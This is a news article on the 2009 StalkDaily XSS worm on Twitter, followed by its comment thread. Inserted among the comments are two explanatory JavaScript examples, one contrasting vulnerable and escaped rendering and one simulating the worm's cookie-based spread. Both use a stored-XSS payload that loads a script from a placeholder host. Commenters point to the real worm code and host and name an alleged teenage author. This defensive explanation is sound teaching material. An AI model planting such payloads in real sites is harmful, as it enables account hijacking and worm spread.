
A bad week for Twitter just got even worse. The service has apparently been infected by a worm that seems to originate from the owners of the website StalkDaily (note: do not visit this website, as it may cause your computer to become infected). At this point details are scant, but it appears that simply viewing the Twitter profile page of an infected user can cause your own profile to become infected as well (some reports say that the worm modifies your ‘About Me’ section to include a link to the worm). Infected accounts then begin repeatedly spamming tweets that direct users to the StalkDaily website.
The attack appears to have originated early this morning, when a handful of blog posts popped up detailing the worm. However, it is only now hitting critical mass, with hundreds of related tweets appearing on Twitter Search in the last few minutes alone. Twitter’s official spam-watching account updated this morning stating that the company was aware of the issue and that it had been mostly resolved, and has just issued another update acknowledging the worm’s resurgence this afternoon.
To stay on the safe side, it would probably be wise to stick with a third-party Twitter client and avoid viewing profile pages until the company confirms that the issue is resolved.
Some early comments indicate this is an XSS attack on Twitter. Others note that the attack may have started after one of Twitter’s many third-party applications took the login credentials entered by Twitter users and hijacked their accounts.
Update 9 PM PST: Twitter has posted the following update to its status page stating that the issue has been fixed:
Update on StalkDaily.com Worm 36 minutes ago
Earlier today we were informed of a malicious site that was spreading links to StalkDaily.com on Twitter without user consent via a cross-site scripting vulnerability. We’ve taken steps to remove the offending updates, and to close the holes that allowed this “worm” to spread. No passwords, phone numbers, or other sensitive information were compromised as part of this attack.

Update: Apparently StalkDaily has updated its website to say that it has nothing to do with the attacks. Regardless, do not visit the site for the time being.
For everyone wondering, I did NOT promote and/or was involved with the spamming ON Twitter. All bad things you are hearing about this site is not true. Please reconsider as I am not the person who did this…StalkDaily is a website that follows the same functions as Twitter, except more advanced. How? Well, instead of just adding an “update status”, people can add pictures and videos. Then you can stalk them, so when they upload a video or picture, or comment someone, you’ll know!
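The hole the article and Twitter's status update describe is a stored cross-site scripting bug: a profile field is written into the page markup unescaped, so a value that closes the `href` attribute can plant a `<script>` tag that runs in the browser of everyone who views the profile. The following is an added example, not code from the article, from Twitter or from the worm; the payload shape and the `example.com` / `worm.invalid` hostnames are constructed, and the strict URL allow-list and length cap are this example's own assumptions about what a "Web" field should accept.

```javascript
// Added example: vulnerable vs. hardened rendering of a profile "Web" field.
// Not Twitter's code. Payload and hostnames are constructed placeholders.

// Constructed payload in the shape the thread describes: close the attribute and
// the anchor, drop in a remote script, then reopen an anchor so the markup parses.
const PAYLOAD =
  'http://example.com"></a><script src="http://worm.invalid/x.js"></script><a href="';

// Vulnerable rendering: the stored value is concatenated straight into markup.
function renderWebFieldVulnerable(url) {
  return '<a href="' + url + '">' + url + '</a>';
}

// Output encoding for the five characters that can change HTML structure.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Write-time allow-list (an assumption of this example, not Twitter's rule): an
// absolute http(s) URL built only from characters that can never close an attribute
// or open a tag. This also refuses javascript: and data: schemes outright.
const WEB_URL_RE = /^https?:\/\/[a-z0-9.-]+(?::\d+)?(?:\/[a-z0-9._~%\/?=&#+-]*)?$/i;
function isAcceptableWebUrl(value) {
  return typeof value === 'string' && value.length <= 100 && WEB_URL_RE.test(value);
}

// Hardened path: reject at write time, and escape at render time regardless, so a
// bad value that reaches storage through some other route is still inert.
function storeWebField(value) {
  return isAcceptableWebUrl(value) ? { ok: true, stored: value } : { ok: false, stored: '' };
}
function renderWebFieldSafe(stored) {
  if (stored === '') return '';
  const safe = escapeHtml(stored);
  return '<a href="' + safe + '" rel="nofollow">' + safe + '</a>';
}

// Would a browser find an executable script element in this markup?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

function demo() {
  return {
    vulnerableExecutes: containsScriptTag(renderWebFieldVulnerable(PAYLOAD)),
    payloadAccepted: storeWebField(PAYLOAD).ok,
    escapedExecutes: containsScriptTag(renderWebFieldSafe(PAYLOAD)), // if it reached storage anyway
    legitAccepted: storeWebField('http://example.com/me').ok,
    jsSchemeAccepted: storeWebField('javascript:alert(1)').ok,
  };
}
```

Run `demo()` in Node: the vulnerable renderer emits a live `<script>` element, the allow-list refuses the payload and the `javascript:` URL while accepting a plain profile link, and even a payload that somehow reached storage comes out as harmless `&lt;script` text once the attribute is encoded. Encoding for the output context is the fix; filtering tweet text for a domain name, as later comments propose, is neither necessary nor sufficient.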
Glad to hear that Twitter is on top of this. Thanks for the update Jason.
Here is a screenshot of STALKDAILY.COM http://twitpic.com/36mo5
Wow. Cloning the service (as it’s easy to do) is one thing, cloning the layout is just pathetic.
Unfortunately, if I’m understanding the service right, it might just be what I’ve been looking for as a mobile version of Tumblr.
It’s back.
People who have been hacked – do not visit these profiles: http://tinyurl.com/cvujsd (Twitter Search link)
If you’ve been infected, change the URL in your profile, SIGN OUT from the Twitter WebUI, and wait for a fix.
‘Mikeyy’ only has access to your account while you’re signed in to the webui, as it’s cookie based. He doesn’t have your password.
http://twitter.com/BeauGiles
update: apparently stalkdaily.com is not involved in the attacks and it’s safe to visit the site. Only avoid visiting user profiles, as the attacking spam has not been cleaned from user profiles yet.
via: http://mashable...kdaily-twitter/
That is a kiss of death for that site as is the name…
A 17-year-old kid claims responsibility for the worm http://adjix.com/b52w via @breakingnews
Really? Did he do this?
http://www.smartbloggerz.com
@typhoon, stop using Shahid Kapur’s pic
he’s gonna sue u
☻/
/▌
/ \ Hi. I’m Bob. I’m taking over the internets.
They need to post a message within your Twitter account. A forced Tweet from them when you sign in so you see it!
Who is Michael “Mikeyy” Mooney? A 17-year-old from Winnfield, LA: http://sqworl.com/?i=a11951
Known kiddie who has been sent a cease & desist by Stickam for attacks, and tries to XSS his own classmates’ profiles
“Twitter on top of this?” Considering the irresponsible manner in which Twitter is administered, these problems this weekend were only a matter of time. And there will be more service interruptions.
I would try http://www.clasilistados.org
Maybe you can find something sexy there ; )
Jennie
wtf you have got to be kidding me
I got hit by it in the last hour. Was rather bizarre as it tweeted 4 tweets from my account directing people to stalkdaily. Luckily I was able to delete the tweets pretty quickly but I still got @replies and unfollows because of the tweets. It did however also change my URL in my bio to stalkdaily.com (Don’t go on it) so I’ve changed my password yet again and cleared my cache. Hopefully that’s seen to it but looks to be the first twitter virus?
Meanwhile, the StalkDaily site is complaining in broken English about being associated with this. Wouldn’t be the internet’s first joe job, but StalkDaily’s site doesn’t appeal to me anyway.
I love how they throw in some advertising.
Yeah maybe they do have something to do with it!
If you were totally innocent why add spam into your disassociation rebuttal?
“visiting the Twitter profile page of an infected user can lead your profile to become infected as well “
That is the disturbing part.
How come such a large application is exposed to an XSS attack, or is there something I don’t get?
The XSS was in the Web field. This XSS didn’t exist last week. Twitter has been testing some new redesigns of the profile page. The XSS was in the new code.
So within this short time slot, someone managed to see the security vulnerability and also hack it.
I’m impressed.
Maybe they deserve to get all those twitter users.
Seems like those guys at stalkdaily.com know better than Twitter how to handle XSS attacks.
So it’s Twitter, just better (you can add pictures and videos, and we also understand security).
Shame on Twitter.
Sanitizing user input is something they teach you in Security 101. Another demonstration of Twitter not having a clue.
turns out the ‘virus’ is an xss attack on twitter. Kinda unimpressed. Here’s the code:
http://gist.github.com/93782
you can ‘infect’ your account by visiting ANYONE who has been infected on twitter, whilst logged in.
Oh, and your password is safe: they don’t get at that.
Interesting find.
Could this be a proof-of-concept hack, by chance? The XSS part of the scam is highly surprising for a site this large.
Just proves that the default security settings for browsers should not allow HTML to be read if it’s from another domain.
The biggest issue is that this appears to have started entirely from phishing Twitter usernames and passwords under the guise that they were going to use the data for the API as any other developer would normally use it.
I think that Twitter has grown to the point now that it needs a more secure login system like that of Facebook Connect or require OAuth as the only system for API Developers.
I don’t see how visiting StalkDaily.com would pose any threat. I went to view-source:http://www.stalkdaily.com/ and the only scripts I see are a Google Analytics ga.js and a statcounter.com script. Just in case though, I’m still not going directly there.
Welcome to web 2.uhoh
Do people honestly think that all these niche websites that were popping up everyday were being built and designed by people with security in mind? You would be surprised at how many of these sites are running on databases that don’t even encrypt passwords.
They think because it is an HTTPS page they are safe, but they don’t know what protection is being provided once their data gets dumped into some database.
This is only a glimpse into what is to come, sad to say.
Most people run around the web using the same username/password for almost everything, and sign up for EVERYTHING! The chickens are gonna come home to roost.
This might be a little different in nature, but it should underscore the importance for people to limit what they sign up for, and to use different passwords for everything. It’s hard to keep track of, but it’s necessary.
“You would be surprised at how many of these sites are running on databases that don’t even encrypt passwords.”
humour us, how many ? which ones ? Since you know so much, prove to us you aren’t pulling these out of your ASS. Waiting….
If we’re looking for an optimistic outlook, at least it happened on Twitter, right?
I think we’re about to see one of the quickest clean-ups in the history of web-maliciousness. At the rate news, information, and education travels on Twitter ~ and yes, even potentially worms, virii, etcetera, etcetera ~ this thing can’t possibly last long.
Twitter, methinks, is about to show itself off as analogous to Firefox in this regard.
Speaking of, I’d like to know what browsers and systems are being infected. I’m sure I know the answer, but verification would be spiffy.
trench: Using FF 3.0.8 here
http://search.t...neff+stalkdaily
With all those millions Twitter still can’t hire somebody that knows how to fashion a regular expression.
http://www.regu...xpressions.info
There Twitter, bookmark that.
s/StalkDaily//gis;
wow, that was super hard.
That’s not even a regular expression. The leading s shouldn’t be there, there shouldn’t be an extra / at the end, there is absolutely NO use for that dotall (s) flag and you don’t need a g flag if you’re just testing to see if a string matches a regexp, and it shouldn’t ever end with ;
/StalkDaily/iElijah
the s was for sed, the bash command that does regular expression matching and replacing
http://mailman....ust/001330.html
You can also lookup the man page on sed.
The g is for global, because we want to globally replace this, not just perform a grep or egrep style search for it.
The s is to concatenate all lines of the searched string as one so we can search through line returns, where you may want to do
s/Stalk[\r\n]Daily//gis;
Remember the infamous Sammy MySpace worm?
That was exploited via a vulnerability in Flash where if you did geturl("java\nscript:alert('foo')")
… the line return in JavaScript would overrule the Flash 8 security for disabling JavaScript in the Flash movie DOM object tag.
The i is for case insensitivity, which is pretty obvious.
So no, you are wrong. These flags were not put in by accident, and neither was the 3rd backslash.
For those that don’t know sed is short for stream editor. Where a file is opened as disk I/O and the STREAM of textual or binary data is then FILTERED.
“The g is for global, because we want to globally replace this, not just preform a grep or egrep style search for it.”
Well, grep does spew out EVERY match, so let me rephrase that, we want to use g to replace every instance, not just the first one.
Even if the s was replaced with an m, we would still want the g there.
So if I say “StalkDaily sucks” they would delete (or whatever you think they should do) the post automatically.
The smart decision would be to just compare it with the 6 different possible updates:
“Dude, http://www.StalkDaily.com is awesome. What’s the fuss?”
“Join http://www.StalkDaily.com everyone!”
“Woooo, http://www.StalkDaily.com”
“Virus!? What? http://www.StalkDaily.com is legit!”
“Wow…www.StalkDaily.com”
“@twitter http://www.StalkDaily.com”
I visited stalkdaily just now with my javascript turned off. but viewing the source the only js I see is google analytics and statcounter. All i see is a site that’s mimicking twitter’s stylesheet and claiming to be an enhanced version of twitter.
It states on the homepage:
“For everyone wondering, I did NOT promote and/or was involved with the spamming ON Twitter. All bad things you are hearing about this site is not true. Please reconsider as I am not the person who did this.
StalkDaily is a website that follows the same functions as Twitter, except more advanced How? Well, instead of just adding an “update status”, people can add pictures and videos. Then you can stalk them, so when they upload a video or picture, or comment someone, you’ll know!”
That’s clearly BS if you do a quick search on the history of the site, related sites, nameservers, and owner(s)/users.
As far as I’ve seen it’s specifically the Gangsterboyhah account that’s doing all the infecting.
Ridiculous… is nothing sacred????
How are you supposed to change your password if you are locked out of your account? Did I miss step 1?
They call it “Forgot your password”. It’s magic, so I heard.
brilliant!
Thanks for the post, Mike.
(I think you meant to thank Jason.)
(I think I meant to see Mike’s comma.) #oops
failed blog needs to capture your post
http://pastebin.com/m4e6afa74 in his bio-> mikeyylolz.uuuq dot com/x.js
i got myself infected by visiting profile of someone who was. wtf.
but i kind of feel bad if the owner of the site didn’t do this. what if it was someone trying to bring them down?
i.e. what’s stopping someone from targeting an unsuspecting startup or blog and making it look like they were behind it?
My guess:
StalkDaily.com claims they are a service like Twitter, just a little better.
They’re definitely gonna get the buzz now, and exactly from the same user base they’re looking for.
Maybe one of their affiliates did that, or maybe they did, or maybe someone did it “for them” without them even knowing about it, someone who is disgusted with Twitter, for example.
Nevertheless, it can’t be a coincidence.
So that the only 2 visitors that usually go to stalkdaily don’t go there anymore?
nothing
Wow..
I got infected right after Christine today by clicking her profile, as I couldn’t believe she would post the stalkdaily blurb.
I agree with her that if someone wanted to stop a new startup, this would be the perfect way to get a ton of bad press.
My big question is Why does this hit all the blogs before it makes the status.twitter.com page? Shouldn’t THEY be telling everyone about it, how to avoid it, and what to do if infected? Basically inexcusable IMO
The owner is saying its not him ya right!
Twitter: seanyoughal
Rob: Twitter doesn’t care about you. They only care about celebrities.
Robert, did you get notification?
My guess is that it only affects Windows.
It operates at the JavaScript level, so there is no reason that would be confined to any given OS. IOW, the non-Windows users are not off the hook on this one!
Any word as to whether NoScript successfully blocks the XSS attempt? (NoScript is a Firefox extension that allows scripts and applets on a per-site basis—the way I’ve always said that it should be. It also does its best to block cross-site scripting. Don’t leave localhost without it!)
Did techcrunch block my ability to comment? testing 1,2,3.
weird, my last reply didn’t go through.
Anyhow, as I tried to state before: as the code on the page linked by James Cox shows, this is spreading through updating users’ profile URLs with a script source that updates your visitors’ profile URLs as well. It covers up this fact by posting a random tweet to that website and including that website in your profile URL before appending itself.
because we are twitter and they expect the news to spread automatically through the network without them doing anything
Tip: Possibly Use OpenID + hardware token for credentialing + linking profiles. Keep those authentication times *very* short.
Tip: Use the old security adages: “change your passwords routinely; don’t use the same userid/password combination across all sites; make it difficult with 7+ chars and special chars” – uP3R(A$e – kinda looks like the word uppercase, right?
Infections/malware is rampant on popular sites – people & idiots attack what they lack.
none of which would protect against an xss attack vector using ajax to post with an already authenticated user.
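The propagation path the two comments above describe (a script stored in an infected profile runs in a logged-in visitor's browser, the browser attaches the visitor's own session cookie to the requests it makes, and the script rewrites the visitor's profile and posts the lure tweet) can be shown with a small in-memory model. This is an added example, not the worm's code and not Twitter's; the users, the toy API, the tweet text and the hostnames are constructed for the example. It also shows why the advice in the thread to sign out of the web UI helps while stronger or unique passwords do not: the script never needs a password, only a live session.

```javascript
// Added example: in-memory model of a self-propagating stored XSS. Not the worm's
// code, not Twitter's. Users, API, tweet text and hostnames are constructed.

const users = new Map();    // name -> { profileUrl, tweets }
const sessions = new Map(); // cookie -> name (cookie-based auth, as the thread notes)

function createUser(name) {
  users.set(name, { profileUrl: 'http://example.com/' + name, tweets: [] });
}
function login(name) {
  const cookie = 'sess-' + name + '-' + Math.random().toString(36).slice(2);
  sessions.set(cookie, name);
  return cookie;
}
function logout(cookie) { sessions.delete(cookie); }

// The site's write API. It never sees a password; a valid session cookie is all it checks.
const api = {
  updateProfileUrl(cookie, url) {
    const name = sessions.get(cookie);
    if (!name) return false;
    users.get(name).profileUrl = url;
    return true;
  },
  tweet(cookie, text) {
    const name = sessions.get(cookie);
    if (!name) return false;
    users.get(name).tweets.push(text);
    return true;
  },
};

// Constructed payload in the shape the thread describes: close the href attribute,
// pull in a remote script, reopen an anchor. The host is a placeholder.
const INFECTED_URL =
  'http://example.com"></a><script src="http://worm.invalid/x.js"></script><a href="';

// The vulnerable page: the stored URL is concatenated into markup unescaped.
function renderProfile(name) {
  return '<a href="' + users.get(name).profileUrl + '">web</a>';
}

// What the remote script does once the visitor's browser runs it. The browser sends
// the visitor's cookie with every same-origin request, so the script acts AS the
// visitor: it rewrites their profile (to keep spreading) and posts the lure tweet.
function wormPayload(visitorCookie) {
  const spread = api.updateProfileUrl(visitorCookie, INFECTED_URL);
  api.tweet(visitorCookie, 'Wow...http://example.com'); // constructed lure text
  return spread;
}

// A page view: render, then execute any <script> with whatever cookie the browser
// holds for the site (none, if the visitor signed out of the web UI first).
function visitProfile(visitorCookie, ownerName) {
  const html = renderProfile(ownerName);
  return /<script\b/i.test(html) ? wormPayload(visitorCookie) : false;
}

function isInfected(name) {
  return /<script\b/i.test(users.get(name).profileUrl);
}

// Scenario: one seeded profile, one logged-in visitor, one signed-out visitor.
function simulate() {
  users.clear(); sessions.clear();
  createUser('patient0'); createUser('alice'); createUser('bob');
  users.get('patient0').profileUrl = INFECTED_URL;        // seed the first infection

  const aliceCookie = login('alice');
  const aliceHit = visitProfile(aliceCookie, 'patient0'); // logged in: becomes a carrier

  const bobCookie = login('bob');
  logout(bobCookie);                                       // signed out of the web UI
  const bobHit = visitProfile(bobCookie, 'alice');         // script runs, but has no session

  return {
    aliceHit, aliceInfected: isInfected('alice'), aliceTweets: users.get('alice').tweets.length,
    bobHit, bobInfected: isInfected('bob'), bobTweets: users.get('bob').tweets.length,
  };
}
```

Running `simulate()` in Node shows Alice carrying the payload and tweeting after one page view while signed-out Bob views an infected page unharmed. Nothing in the model ever reads a password, so password hygiene, OpenID or a hardware token would change none of these results; only fixing the render step (escaping the stored value) or removing the session the script acts with does. In the same-origin setting a CSRF token would not help either, since the injected script runs on the site's origin and can read the token like any other page script.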
Are all web browsers vulnerable or only certain OSes or browsers?
Just windows
sadly you’ve taken the “computer talk” on 24 all too literally. ok, mail me that rsa keyfob so i can sign up for your social network….
Robert: No kidding….They don’t care about anyone. Not even their own asses.
Rob: communication has never been Twitter’s strong suit.
Here is the link to the worm code: http://gist.github.com/93782
Rob Nelson – EXACTLY!!! damn good question!
I guess it was only a matter of time, as most things that get popular so quickly do not have time to institute the proper security measures.
My Facebook got hacked last month and someone was able to ask all my friends for money. Luckily I was contacted by a friend asking why I was in London and yet I was in Brisbane Australia.
I closed it all down with a final post of don’t send me any money.
So beware and keep good accounts.
Q
twitter don’t care…..
+1 scoble – although I would add "and those who bring them cupcakes and/or fluff them everyday with posts"
I am on a Mac and was infected. How do I remove the link to stalkdaily on my profile by using a 3rd party app?
Well it would seem that 3 Roberts are in agreement here. You would THINK that a communications oriented company would be better at ….communications…hmm..Frankly it seems that this does not bode well for the long term of twitter. Maybe they should sell it now before they kill it themselves.
Uh… Where are all my past tweets? My Twitter page only has my most recent update, all of the others appear to be gone. Tell me I haven’t lost everything?!
I personally know Mikeyy (the owner of stalkdaily.com) and it was not him who made the worm. We actually have no clue who made it. I’m second thing to an owner of StalkDaily, but I recently made my own site and quit using it.
You might want to have a little chat with your friend then, ’cause he’s made quite an effort to spread the news that it was him who made the worm:
http://netnewsd...ily.com/?p=1558
:-/
What about how to remove the worm?
I’m hoping Twitter is going to offer an ‘official fix’. If they don’t soon, I’ll post a link to a blog with instructions.
Sounds appropriate.
Keep shooting yourself in the foot Twitter, eventually everyone will realize that your service sucks and that FriendFeed Rocks.
Hmmmm… a lot of FriendFeed love going on here (me starts to wonder what THAT is about)
FriendFeed and Twitter, I think, are two different services. One can follow everything you are doing socially online (like MyBlogLog, which fell out of favor for some reason here at TechCrunch) with one, while the other is very simple microblogging that doesn’t even allow more than 140 letters: less than the standard 160 letters that a cell phone text would.
Compare Twitter to Plurk, fine. Twitter to FriendFeed just doesn’t make sense to me. Even Twitter to Facebook would work better than Twitter to FriendFeed.
But anyway… hope they explain all of this BEFORE Monday hits and people really start signing in and tweeting stuff
Mark Hawker did a great job figuring the whole thing out, and posted the details in the comments to my post at http://www.netw...nity/node/40822
Complete page source and so on can also be found at that link.
Admittedly, Twitter’s going to be cursing itself today. It’s also a good day for any Friendfeed people to show off Friendfeed’s best features helping provide people with updates on that worm situation. Helping in a crunch is a good way to show how Friendfeed can be used effectively.
Well, there’s another stupid thing I’ll never have to worry about. 30 years of computer usage and Microsoft operating systems have taught me to never become the early adoptee. I’ll order Texas Toast and eggs for your spam.
ADOPTER
Does this mean I might not be able to tweet about going to the store and buying a half gallon of milk???
GOD HELP US ALL!!!!
Wow this is crazy watch my video for more info on this.
http://www.yout...h?v=rFf3JziOHWg
There are additional notes on the worm posted here (sorry for the other blog link but…)
http://www.netw...nity/node/40822
and more code here
http://gist.github.com/93782#
I was on the very breaking edge of this after investigating claims from a follower, and determining that they were correct. It took mashable and TechCrunch about (but less than) an hour to get this story up. Twitter’s spam account responded publicly after that (IIRC)
FURTHERMORE – Twitter continues in its inconsiderate (and potentially disastrous) behavior by not posting incidents to the status.twitter.com page. Several users requested that Twitter post not only the fact that this was happening but suggested corrective measures. As of this writing, Twitter never posted word one to their status page. VERY IRRESPONSIBLE on the part of Twitter. Inexcusable IMO.
Twitter persists in its apparent belief that the outside world will think all is hunky-dory if they simply don’t post negative status updates. This WILL harm Twitter in the end.
But it’s no surprise. Twitter doesn’t really care about its users. A few great people inside twitter (like @a3lx) do care, but that doesn’t help the users to know anything. The users of twitter are left in the dark hunting for answers.
In fact, as I write this, I am still inundated with user questions about what happened, how to know if they are infected, and what to do if they are.
I said it above, and I’ll say it here:
It was TOTALLY IRRESPONSIBLE of Twitter to leave their users in the dark.
Thank you TechCrunch for being on the breaking edge of this story. Hats off to you and the other Big Blogs (like Mashable) for exposing this and getting the word out to all the tweeps.
Good Job!
6 minutes after my previous comment, and 13 minutes after a similar comment to Mashable, status.twitter.com was updated.
Since this is running Javascript, am I correct in assuming NoScript in Firefox would block the script, thus preventing the infection? Or am I “living in a Fool’s Paradise?”